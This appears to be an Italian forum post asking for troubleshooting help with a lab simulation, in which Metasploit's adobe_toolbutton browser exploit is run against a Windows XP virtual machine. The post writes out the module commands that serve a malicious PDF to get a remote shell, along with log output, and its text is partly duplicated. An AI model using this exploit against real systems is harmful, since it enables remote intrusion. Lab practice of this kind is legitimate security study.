Salve a tutte e tutti, sto provando a simulare un attacco facendo leva sulla vulnerabilità nota Adobe Reader ToolButton [1] tramite metasploit.
Utilizzo una macchina virtuale con Windows XP SP3 e Adobe Reader 9.0.
Questi sono i comandi che eseguo dopo aver lanciato metasploit:
viene generato un link tipo http://<mio_ip_locale>:8080/e48Ef1eqM al quale clicco tramite Internet Explorer sulla macchina virtuale.
Reazione VM:
- Apertura di un documento PDF vuoto
Reazione metasploit:
Mantenendo una riga vuota, come se effettivamente avessi una shell aperta ma se provo a scrivere un comando tipo dir l'output che viene mostrato è relativo alla mia macchina e non alla VM e dopo mi esce di nuovo la scritta msf6 exploit(windows/browser/adobe_toolbutton) > come se avesse chiuso la shell creata e per tornare a quella situazione devo ricaricare il link http://<mio_ip_locale>:8080/e48Ef1eqM dalla VM.
[1] https://www.rapid7.com/db/modules/exploit/windows/browser/adobe_toolbutton/
Utilizzo una macchina virtuale con Windows XP SP3 e Adobe Reader 9.0.
Questi sono i comandi che eseguo dopo aver lanciato metasploit:
Codice:
use exploit/windows/browser/adobe_toolbutton
set TARGET 0
set LHOST <mio_ip_locale>
set SRVHOST <mio_ip_locale>
exploit
viene generato un link tipo http://<mio_ip_locale>:8080/e48Ef1eqM al quale clicco tramite Internet Explorer sulla macchina virtuale.
Reazione VM:
- Apertura di un documento PDF vuoto
Reazione metasploit:
Codice:
[*] <mio_ip_locale> adobe_toolbutton - Sending HTML response to <mio_ip_locale>
[*] <mio_ip_locale> adobe_toolbutton - request: /e48Ef1eqM/MYmLAV/
[*] <mio_ip_locale> adobe_toolbutton - Sending PDF...
Mantenendo una riga vuota, come se effettivamente avessi una shell aperta ma se provo a scrivere un comando tipo dir l'output che viene mostrato è relativo alla mia macchina e non alla VM e dopo mi esce di nuovo la scritta msf6 exploit(windows/browser/adobe_toolbutton) > come se avesse chiuso la shell creata e per tornare a quella situazione devo ricaricare il link http://<mio_ip_locale>:8080/e48Ef1eqM dalla VM.
[1] https://www.rapid7.com/db/modules/exploit/windows/browser/adobe_toolbutton/